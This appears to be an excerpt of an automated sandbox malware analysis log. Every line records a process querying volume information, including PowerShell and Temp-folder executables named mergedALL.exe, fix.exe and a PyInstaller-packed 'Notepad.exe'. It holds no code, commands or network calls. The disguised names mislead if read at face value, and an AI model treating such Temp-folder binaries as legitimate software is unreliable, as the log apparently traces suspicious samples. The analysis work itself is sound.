Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Users\user\AppData\Local\Temp\mergedALL.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Users\user\AppData\Local\Temp\fix.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\_wmi.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
